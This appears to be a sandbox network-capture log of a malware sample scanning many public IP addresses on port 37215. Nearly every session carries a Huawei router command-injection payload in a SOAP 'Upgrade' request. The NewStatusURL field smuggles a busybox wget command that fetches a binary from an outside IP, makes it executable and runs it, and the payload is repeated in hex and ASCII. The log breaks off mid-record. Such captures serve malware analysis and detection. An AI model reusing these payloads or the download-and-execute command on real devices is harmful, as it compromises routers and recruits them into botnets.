                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1762192.168.2.1553358197.99.242.22037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946178913 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1763192.168.2.154624037.14.84.10337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946211100 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1764192.168.2.154923437.181.115.12437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946214914 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1765192.168.2.154073045.217.73.2637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946245909 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1766192.168.2.1544728222.127.30.22537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946254015 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1767192.168.2.1547720122.148.213.12837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946275949 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1768192.168.2.1544292121.197.98.19737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946297884 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1769192.168.2.1535184102.184.112.6737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946331024 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1770192.168.2.153506045.18.176.17837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946337938 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1771192.168.2.1538330222.107.20.10337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946378946 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1772192.168.2.155748637.148.34.7737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946379900 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
